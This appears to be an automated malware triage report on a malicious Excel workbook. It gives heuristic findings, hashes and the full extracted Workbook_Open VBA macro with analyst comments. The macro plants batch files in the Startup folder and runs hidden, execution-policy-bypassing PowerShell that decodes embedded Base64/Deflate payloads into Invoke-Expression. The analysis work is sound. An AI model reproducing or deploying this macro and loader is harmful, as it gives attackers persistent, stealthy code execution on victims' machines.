Malware Insights
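The sample contains a Workbook_Open macro, which runs automatically when the workbook is opened with macros enabled. The macro creates two batch files (Windows.Storage.Search.bat and windows.UI.Core.bat) in the current user's Startup directory, likely to ensure persistence, and then launches each of them immediately through a hidden "cmd /k" shell. Each batch file executes a hidden PowerShell command. The command's script body is obfuscated: it is Base64-encoded and Deflate-compressed, then decoded in memory and passed to Invoke-Expression. It is designed to download and execute a second-stage payload; the decoded script itself is not reproduced in this report, so that behaviour cannot be confirmed from the listing alone. The PowerShell command reconstructs to (excerpt, truncated): powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("5VdLj+M2DL7nVwiBDwkmHsiyZMcbDLDbLgosUBQFZtAeghz8kDtGHSdInG1m2/73mlRIR5nptui1F1oSqY8fKerhoBQP4v10sv7Ytp+2+92hn01/tYfOtrG6r9p2Ot+I/alom1Ic+7wfPvbcD3rxqet/7A/ip+bQn/L2Q9vuytll7LeFODVdL86X78vl+2W++s9+vj3YvLdPz8OnIj+nC+7nhRg9X1pXvi8jt963x8/lof83vrd2e7T97DUyRzV9Pwl2QyI/VFX49LK3IhzmFPbw0dZN1/TNr… [truncated]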
Heuristics 7
-
VBA project inside OOXML — medium — 5 related findings — OOXML_VBA: Document contains a VBA project — VBA macros present
-
Potential Shell call in VBA — critical — OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
argh = Shell("cmd /k " + Chr(34) + Path + Chr(34), vbHidden) -
PowerShell reference in VBA — critical — OLE_VBA_PS: PowerShell reference in VBA. Matched line in script:
str = "" str = str + "if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -" str = str + "NoP -NonI -W Hidden -Exec Bypass -Command " + Chr(34) + "Invoke-" -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Attribute VB_Customizable = True Private Sub Workbook_Open() Dim str As String -
Environ() call (env variable access) — low — OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
Dim username As String username = Environ$("UserName") -
Suspicious extracted artifact — high — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12061 bytes |
SHA-256: 7e0daa4acd59546cb756565e88285ae4b67459dcbe6ac198b990e8c5db408c96 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
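174 of 268 identifiers look randomly generated (e.g. 'lDDnQhPHUazxdUwvtsKivTLDgFPvVFAwywFBdmkY'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation. Note that the example string is a fragment of the Base64 payload inside the macro's string-concatenation chain, not a renamed VBA identifier, so this count largely reflects the embedded encoded blob rather than mangled variable names.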
|
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
' Analyst notes (defensive annotation; the statements below are the specimen as extracted, unchanged).
' Workbook_Open is Excel's auto-run event handler: it fires when the workbook is opened and
' macros are allowed to run. Behaviour visible in this listing:
'   1. builds two .bat paths under the current user's Startup folder,
'   2. writes "@echo off" plus one long PowerShell command line into each file,
'   3. launches both files immediately through hidden cmd.exe instances.
' Files in the Startup folder are also run at later logons, which is the persistence mechanism.
Dim str As String
Dim str2 As String
' Command and exec are declared but never used in this procedure.
Dim Command As String
Dim exec As String
' The logged-on account name is read from the environment to build a per-user path.
Dim username As String
username = Environ$("UserName")
' The profile root is hard-coded to C:\Users. Backslashes are not escape characters in VBA,
' so these literals really contain doubled "\\" separators.
' NOTE(review): Windows path handling normally tolerates doubled separators - confirm on the target OS.
Dim Path As String
Path = "C:\\Users\\" & username & "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\startup\\Windows.Storage.Search.bat"
Dim Path2 As String
Path2 = "C:\\Users\\" & username & "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\startup\\windows.UI.Core.bat"
' FS is used without a Dim in this listing. FileSystemObject and TextStream are used early-bound.
' NOTE(review): early binding implies the VBA project references the Scripting runtime - confirm in vbaProject.bin.
Set FS = New FileSystemObject
Dim stream As TextStream
Dim stream2 As TextStream
' Create a TextStream.
' The second argument (True) lets CreateTextFile overwrite an existing file of the same name.
Set stream = FS.CreateTextFile(Path, True)
Set stream2 = FS.CreateTextFile(Path2, True)
' First batch file, line 1.
str = ""
str = str + "@echo off"
stream.WriteLine str
' First batch file, line 2: a single if/else on %PROCESSOR_ARCHITECTURE%, assembled from short
' fixed-width string pieces (the concatenation chains flagged by the static triage).
'   x86 branch:  powershell.exe as resolved by the command interpreter
'   else branch: %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe
' so the 32-bit PowerShell host is selected in both cases.
' Flags: -NoP (no profile), -NonI (non-interactive), -W Hidden (no window), -Exec Bypass (execution policy bypass).
' The -Command argument Base64-decodes the blob, inflates it with DeflateStream, reads it as ASCII
' and hands the resulting text to Invoke-Expression. The decoded script is not part of this listing.
' Chr(34) is the double-quote character; a literal ending in "\" followed by Chr(34) emits \" so the
' inner quotes around the Base64 string are escaped inside the quoted -Command argument.
' The same blob (starting "5Vd") is embedded twice, once per branch.
str = ""
str = str + "if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -"
str = str + "NoP -NonI -W Hidden -Exec Bypass -Command " + Chr(34) + "Invoke-"
str = str + "Expression $(New-Object IO.StreamReader ($(New-Obj"
str = str + "ect IO.Compression.DeflateStream ($(New-Object IO."
str = str + "MemoryStream (,$([Convert]::FromBase64String(\" + Chr(34) + "5Vd"
str = str + "Lj+M2DL7nVwiBDwkmHsiyZMcbDLDbLgosUBQFZtAeghz8kDtGH"
str = str + "SdInG1m2/73mlRIR5nptui1F1oSqY8fKerhoBQP4v10sv7Ytp+"
str = str + "2+92hn01/tYfOtrG6r9p2Ot+I/alom1Ic+7wfPvbcD3rxqet/7"
str = str + "A/ip+bQn/L2Q9vuytll7LeFODVdL86X78vl+2W++s9+vj3YvLd"
str = str + "Pz8OnIj+nC+7nhRg9X1pXvi8jt963x8/lof83vrd2e7T97DUyR"
str = str + "zV9Pwl2QyI/VFX49LK3IhzmFPbw0dZN1/TNrhNBKcIf8q0V05+"
str = str + "bLlZTEXZD77jPSytw5LtTV4LlUYT7/Hjsnw+nSXB+CHbv3nlJl"
str = str + "gt5jqSET+w+Ws5XYv3NS2/Xm01whBWV57ocNHY5iGU2CDQcRSJ"
str = str + "JYQ0ARYOoFCg0KIpBGIUevK4svW7Exil0FXiT9SCKFGjlMJYQf"
str = str + "F1TqwTQHKBiEAmMpdCSiAItBSYlGsM0WYHALiBbsKsl0TCpz4o"
str = str + "5a0U+cG41KqCVYnIMEUo1cR6NzTgDjKMlO1oSSWccA6uYvOmM7"
str = str + "GLOkLP7ajb+Nt4YvFkkCXRrAJXgLQW7GrRxQV2lyQ7TZG44a49"
str = str + "zkjA/JF54xlHpGTu7m4i4kLQmeBSmIIHra8DEQHYNh48RoSNTk"
str = str + "xaRIyBukQvwMxBWAnaJBWFotVwpgyKFNCUZm6A3TVpdkgmWo0y"
str = str + "JQYVpwgz5+8PtK/QLdmnO8CULiEPhMgKKAr+4XbAscC8kMQEkA"
str = str + "JVKmobsHZ5iPEPLqNi5iamatCEFFo1zxC7HaeYmEZpDAEUaM7y"
str = str + "lDDnQhPHUazxdUwvtsKivTLDgFPvVFAwywFBdmkYfPmcdUajGE"
str = str + "APciDim+PhypfK/EC7ebHF9WuAC3ArQYo3HmDBIcQrT8psah7E"
str = str + "sXryqcdyh7hzKCM+B4kkY+2PgqOC9f4WCdrwb3YGMLoFBmXhcU"
str = str + "FHiiYmHVu6FircQnuMJJwIrIseTRpP2SkTcYgaIbMZ9WbzBICF"
str = str + "j3Puxnxx3N0pOhGZ46EY1JdudPgCqoZuBt6Uf7z+sIKMoPPShi"
str = str + "/dMesP55qJaesiorRPSukMaQqgzyobMyFEOIZTjDVG9kRxebnf"
str = str + "wYIqt5/Kt2FyuuDAxtnFRCg4aEyv9AIuacq+45VYfCaWU5zG2i"
str = str + "ld6mXtccCwy1MID1J3ybDIK9IYkMVS8K1BcvZZgLr43CjDJFcU"
str = str + "2ssfINRtL90p7jXJ1u4y7JyUt7v0caw33h/F84P41LFyJph6A5"
str = str + "AvodnNymeHlmiUMoL5WZiXUhrvtwYd7ksS+nSGmyN5tbHTEdTU"
str = str + "KXMur+1LRuqFQXGHObsljmrpSrib17iBmQfMgV0EjwtYOnWN5/"
str = str + "73tfumfw2g+jN7dzcXv8HK+PN3X7u2+mQXn+6fd0InVbH4XNPO"
str = str + "FGKaug2azENFc/CF2pz7sTm27+nMSfMG3t/fjMcS7CM4L+MCb+"
str = str + "7HPD3342Fq7F+GjLXddJeBpLuVf\" + Chr(34) + ")))), [IO.Compression"
str = str + ".CompressionMode]::Decompress)), [Text.Encoding]::"
str = str + "ASCII)).ReadToEnd();" + Chr(34) + ") else (%WinDir%\syswow64\win"
str = str + "dowspowershell\v1.0\powershell.exe -NoP -NonI -W H"
str = str + "idden -Exec Bypass -Command " + Chr(34) + "Invoke-Expression $(N"
str = str + "ew-Object IO.StreamReader ($(New-Object IO.Compres"
str = str + "sion.DeflateStream ($(New-Object IO.MemoryStream ("
str = str + ",$([Convert]::FromBase64String(\" + Chr(34) + "5VdLj+M2DL7nVwiBD"
str = str + "wkmHsiyZMcbDLDbLgosUBQFZtAeghz8kDtGHSdInG1m2/73mlR"
str = str + "IR5nptui1F1oSqY8fKerhoBQP4v10sv7Ytp+2+92hn01/tYfOt"
str = str + "rG6r9p2Ot+I/alom1Ic+7wfPvbcD3rxqet/7A/ip+bQn/L2Q9v"
str = str + "uytll7LeFODVdL86X78vl+2W++s9+vj3YvLdPz8OnIj+nC+7nh"
str = str + "Rg9X1pXvi8jt963x8/lof83vrd2e7T97DUyRzV9Pwl2QyI/VFX"
str = str + "49LK3IhzmFPbw0dZN1/TNrhNBKcIf8q0V05+bLlZTEXZD77jPS"
str = str + "ytw5LtTV4LlUYT7/Hjsnw+nSXB+CHbv3nlJlgt5jqSET+w+Ws5"
str = str + "XYv3NS2/Xm01whBWV57ocNHY5iGU2CDQcRSJJYQ0ARYOoFCg0K"
str = str + "IpBGIUevK4svW7Exil0FXiT9SCKFGjlMJYQfF1TqwTQHKBiEAm"
str = str + "MpdCSiAItBSYlGsM0WYHALiBbsKsl0TCpz4o5a0U+cG41KqCVY"
str = str + "nIMEUo1cR6NzTgDjKMlO1oSSWccA6uYvOmM7GLOkLP7ajb+Nt4"
str = str + "YvFkkCXRrAJXgLQW7GrRxQV2lyQ7TZG44a49zkjA/JF54xlHpG"
str = str + "Tu7m4i4kLQmeBSmIIHra8DEQHYNh48RoSNTkxaRIyBukQvwMxB"
str = str + "WAnaJBWFotVwpgyKFNCUZm6A3TVpdkgmWo0yJQYVpwgz5+8PtK"
str = str + "/QLdmnO8CULiEPhMgKKAr+4XbAscC8kMQEkAJVKmobsHZ5iPEP"
str = str + "LqNi5iamatCEFFo1zxC7HaeYmEZpDAEUaM7ylDDnQhPHUazxdU"
str = str + "wvtsKivTLDgFPvVFAwywFBdmkYfPmcdUajGEAPciDim+PhypfK"
str = str + "/EC7ebHF9WuAC3ArQYo3HmDBIcQrT8psah7EsXryqcdyh7hzKC"
str = str + "M+B4kkY+2PgqOC9f4WCdrwb3YGMLoFBmXhcUFHiiYmHVu6Firc"
str = str + "QnuMJJwIrIseTRpP2SkTcYgaIbMZ9WbzBICFj3Puxnxx3N0pOh"
str = str + "GZ46EY1JdudPgCqoZuBt6Uf7z+sIKMoPPShi/dMesP55qJaesi"
str = str + "orRPSukMaQqgzyobMyFEOIZTjDVG9kRxebnfwYIqt5/Kt2Fyuu"
str = str + "DAxtnFRCg4aEyv9AIuacq+45VYfCaWU5zG2ild6mXtccCwy1MI"
str = str + "D1J3ybDIK9IYkMVS8K1BcvZZgLr43CjDJFcU2ssfINRtL90p7j"
str = str + "XJ1u4y7JyUt7v0caw33h/F84P41LFyJph6A5AvodnNymeHlmiU"
str = str + "MoL5WZiXUhrvtwYd7ksS+nSGmyN5tbHTEdTUKXMur+1LRuqFQX"
str = str + "GHObsljmrpSrib17iBmQfMgV0EjwtYOnWN5/73tfumfw2g+jN7"
str = str + "dzcXv8HK+PN3X7u2+mQXn+6fd0InVbH4XNPOFGKaug2azENFc/"
str = str + "CF2pz7sTm27+nMSfMG3t/fjMcS7CM4L+MCb+7HPD3342Fq7F+G"
str = str + "jLXddJeBpLuVf\" + Chr(34) + ")))), [IO.Compression.CompressionMo"
str = str + "de]::Decompress)), [Text.Encoding]::ASCII)).ReadTo"
str = str + "End();" + Chr(34) + ")"
stream.WriteLine str
str = ""
' Close the file.
stream.Close
' Second batch file: same "@echo off" line and the same if/else wrapper and PowerShell flags,
' but carrying a different Base64 blob (starting "vVZ"), again embedded once per branch.
str2 = ""
str2 = str2 + "@echo off"
stream2.WriteLine str2
str2 = ""
str2 = str2 + "if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -"
str2 = str2 + "NoP -NonI -W Hidden -Exec Bypass -Command " + Chr(34) + "Invoke-"
str2 = str2 + "Expression $(New-Object IO.StreamReader ($(New-Obj"
str2 = str2 + "ect IO.Compression.DeflateStream ($(New-Object IO."
str2 = str2 + "MemoryStream (,$([Convert]::FromBase64String(\" + Chr(34) + "vVZ"
str2 = str2 + "Lj+M2DL7nVwiBDwnGHsiWX9lggN12UWCBoigwg/YQ5OCH3DHq2"
str2 = str2 + "IGtbDPb9r/XpEI6TruDQYH2QokiRX4iKUpOIR7E++Vi97FpPh2"
str2 = str2 + "OXW9Wy1913+pGBfdl0yzXe3E85U1diMFkZhz02Yxy8ak1P5pe/"
str2 = str2 + "FT35pQ1H5qmK1aXtd9ccapbI86X8eUyfllv/7Wfb3udGf30PA4"
str2 = str2 + "l+Tld7H52xeT5MrvyfVm59X4YPhe9eYvvgz4M2qz+bplPtXy/c"
str2 = str2 + "LoxkB/K0nt6OWrhjXty3X/UVd3Wpu5a4RTC+yE7aLH8uW5VsBR"
str2 = str2 + "eO3LDMSu0wJXvTm0BmoPwjtkwmOf+tHDOD0737t0syNKVZ19KG"
str2 = str2 + "JQdQrneit03L0bv9ntngIzKc1WMEp2OJN2MBBUnEksS6AgM+SM"
str2 = str2 + "pAxCEIMhHEgXoYcbKYsb6rJwAG4A3WY0kTwBWBmsxma8qmhVgN"
str2 = str2 + "ANTCkgMawnMJFqBWQAqBSrDNlkCQRYsa9CrJMGIkjkqxhwG5AP"
str2 = str2 + "3lpMAZgkGJyJASUiYJ+Vo2gHKfsqOUgJplRWgUuQt3JCe4ghZv"
str2 = str2 + "Vej8dXzKvCmESTArcCoBG8J6FUgVTmxQUh6GKboBnM4wxzHjA+"
str2 = str2 + "B5zNlv5gpW72bE3EhhSGZRxLlRDC/EahEEN2Ij48nQkdRRVK07"
str2 = str2 + "ANwjVgAX1TOYhVnlME8pHTHWHqS2KtCT8kbEpmwIJupIIwMgWM"
str2 = str2 + "uI9pRRlwHG84HY8kxKYwl3pAyGsXLFGtQURyIkKQhRDcBe3hJE"
str2 = str2 + "NrkMufQ3VxdjIt1lFIgUiAVlgAcKwGXKnjNSsr1HHKNW1bNpP9"
str2 = str2 + "k2c/+K8sYg7dYZvIGZcxbpTiDMWUBqzNVFFPJ2Z9q44aN2S+2q"
str2 = str2 + "qsyy6j0rrIPawW43BQ0m/J71XiwwnxGKvls6rWYKi4GrD9s9Zv"
str2 = str2 + "Ava52W/KSIjSRgGsSu54VQOzjiKQKWxW2tJQJKCu8AZu5lYhgI"
str2 = str2 + "InBLz4JaB714pIdKSbIxkzYuZVWtE1OjeJ/JZKv/ZQU2/owFT5"
str2 = str2 + "lRk71jPcSj8/1bFsQ9gg4YIZdOZ4VA6pgBn3O+VXBhWRAYVuX8"
str2 = str2 + "0JifBM0W+jAakwUd7OJpNhuMoJrH7mEygxvBT4s2OUxv5hzFGA"
str2 = str2 + "T9PkvoNheqRmQJim+7PbZwRrC3gkqOT8EeDlt801mxLaMCSm/9"
str2 = str2 + "ngvUzCgM/e60CeCyjb2IecSUBXFLH72oeIHSJVfsWd/KAnFVPt"
str2 = str2 + "0yquYgqDkPq6T7aLqerFy6ge5dWrhNXpkhuL+e93+Yp49fz2u3"
str2 = str2 + "t2txe/wy7t8M3f2n7lfOef7p25kVLBa3zn12hXj1p1T713hr8U"
str2 = str2 + "fojsZrz01zfbPhfMF/4mzT/KI2XXOLgzwP3w0WW+8x0bro/Aed"
str2 = str2 + "dG1pYBvpJR/AQ==\" + Chr(34) + ")))), [IO.Compression.Compression"
str2 = str2 + "Mode]::Decompress)), [Text.Encoding]::ASCII)).Read"
str2 = str2 + "ToEnd();" + Chr(34) + ") else (%WinDir%\syswow64\windowspowershe"
str2 = str2 + "ll\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec "
str2 = str2 + "Bypass -Command " + Chr(34) + "Invoke-Expression $(New-Object IO"
str2 = str2 + ".StreamReader ($(New-Object IO.Compression.Deflate"
str2 = str2 + "Stream ($(New-Object IO.MemoryStream (,$([Convert]"
str2 = str2 + "::FromBase64String(\" + Chr(34) + "vVZLj+M2DL7nVwiBDwnGHsiWX9lgg"
str2 = str2 + "N12UWCBoigwg/YQ5OCH3DHq2IGtbDPb9r/XpEI6TruDQYH2Qok"
str2 = str2 + "iRX4iKUpOIR7E++Vi97FpPh2OXW9Wy1913+pGBfdl0yzXe3E85"
str2 = str2 + "U1diMFkZhz02Yxy8ak1P5pe/FT35pQ1H5qmK1aXtd9ccapbI86"
str2 = str2 + "X8eUyfllv/7Wfb3udGf30PA4l+Tld7H52xeT5MrvyfVm59X4YP"
str2 = str2 + "he9eYvvgz4M2qz+bplPtXy/cLoxkB/K0nt6OWrhjXty3X/UVd3"
str2 = str2 + "Wpu5a4RTC+yE7aLH8uW5VsBReO3LDMSu0wJXvTm0BmoPwjtkwm"
str2 = str2 + "Of+tHDOD0737t0syNKVZ19KGJQdQrneit03L0bv9ntngIzKc1W"
str2 = str2 + "MEp2OJN2MBBUnEksS6AgM+SMpAxCEIMhHEgXoYcbKYsb6rJwAG"
str2 = str2 + "4A3WY0kTwBWBmsxma8qmhVgNANTCkgMawnMJFqBWQAqBSrDNlk"
str2 = str2 + "CQRYsa9CrJMGIkjkqxhwG5AP3lpMAZgkGJyJASUiYJ+Vo2gHKf"
str2 = str2 + "sqOUgJplRWgUuQt3JCe4ghZvVej8dXzKvCmESTArcCoBG8J6FU"
str2 = str2 + "gVTmxQUh6GKboBnM4wxzHjA+B5zNlv5gpW72bE3EhhSGZRxLlR"
str2 = str2 + "DC/EahEEN2Ij48nQkdRRVK07ANwjVgAX1TOYhVnlME8pHTHWHq"
str2 = str2 + "S2KtCT8kbEpmwIJupIIwMgWMuI9pRRlwHG84HY8kxKYwl3pAyG"
str2 = str2 + "sXLFGtQURyIkKQhRDcBe3hJENrkMufQ3VxdjIt1lFIgUiAVlgA"
str2 = str2 + "cKwGXKnjNSsr1HHKNW1bNpP9k2c/+K8sYg7dYZvIGZcxbpTiDM"
str2 = str2 + "WUBqzNVFFPJ2Z9q44aN2S+2qqsyy6j0rrIPawW43BQ0m/J71Xi"
str2 = str2 + "wwnxGKvls6rWYKi4GrD9s9ZvAva52W/KSIjSRgGsSu54VQOzji"
str2 = str2 + "KQKWxW2tJQJKCu8AZu5lYhgIInBLz4JaB714pIdKSbIxkzYuZV"
str2 = str2 + "WtE1OjeJ/JZKv/ZQU2/owFT5lRk71jPcSj8/1bFsQ9gg4YIZdO"
str2 = str2 + "Z4VA6pgBn3O+VXBhWRAYVuX80JifBM0W+jAakwUd7OJpNhuMoJ"
str2 = str2 + "rH7mEygxvBT4s2OUxv5hzFGAT9PkvoNheqRmQJim+7PbZwRrC3"
str2 = str2 + "gkqOT8EeDlt801mxLaMCSm/9ngvUzCgM/e60CeCyjb2IecSUBX"
str2 = str2 + "FLH72oeIHSJVfsWd/KAnFVPt0yquYgqDkPq6T7aLqerFy6ge5d"
str2 = str2 + "WrhNXpkhuL+e93+Yp49fz2u3t2txe/wy7t8M3f2n7lfOef7p25"
str2 = str2 + "kVLBa3zn12hXj1p1T713hr8UfojsZrz01zfbPhfMF/4mzT/KI2"
str2 = str2 + "XXOLgzwP3w0WW+8x0bro/AeddG1pYBvpJR/AQ==\" + Chr(34) + ")))), [IO"
str2 = str2 + ".Compression.CompressionMode]::Decompress)), [Text"
str2 = str2 + ".Encoding]::ASCII)).ReadToEnd();" + Chr(34) + ")"
stream2.WriteLine str2
str2 = ""
' Close the file.
stream2.Close
' Both batch files are run right away rather than waiting for the next logon.
' "cmd /k" keeps the command interpreter resident after the script finishes; vbHidden suppresses its window.
' argh (not declared in this listing) only receives Shell's return value and is not used afterwards.
' Detection angles for defenders: Excel spawning cmd.exe, an Office process writing .bat files into a
' Startup folder, and powershell.exe started with -W Hidden -Exec Bypass plus an inline
' FromBase64String/DeflateStream decoder on the command line.
argh = Shell("cmd /k " + Chr(34) + Path + Chr(34), vbHidden)
argh = Shell("cmd /k " + Chr(34) + Path2 + Chr(34), vbHidden)
End Sub
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 33792 bytes |
SHA-256: 4a08c6be643bf13256fbb187e9ee176a9332b41c4bf3a21740edb454bd5c739c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
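479 of 839 identifiers look randomly generated (e.g. 'uI9pRRlwHG84HY8kxKYwl3pAyGsXLFGtQURyIkKQ'); 4 string-concatenation chain(s) — consistent with name-mangling obfuscation. Note that the example string also appears in the extracted macro source as a fragment of the second Base64 payload, so this count largely reflects the embedded encoded blob rather than mangled variable names.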
|
|||